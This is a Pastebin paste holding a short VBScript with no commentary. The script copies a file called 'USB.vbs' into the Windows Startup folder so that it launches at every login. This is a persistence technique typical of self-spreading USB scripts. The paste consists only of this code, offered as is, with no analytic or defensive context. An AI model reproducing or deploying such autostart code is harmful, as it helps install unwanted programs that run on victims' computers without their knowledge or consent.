Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Option Explicit
- Dim fso, obj
- Set fso = CreateObject("Scripting.FileSystemObject")
- Set obj = CreateObject("wscript.shell")
- fso.CopyFile "USB.vbs" , obj.SpecialFolders("Startup")& "\"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement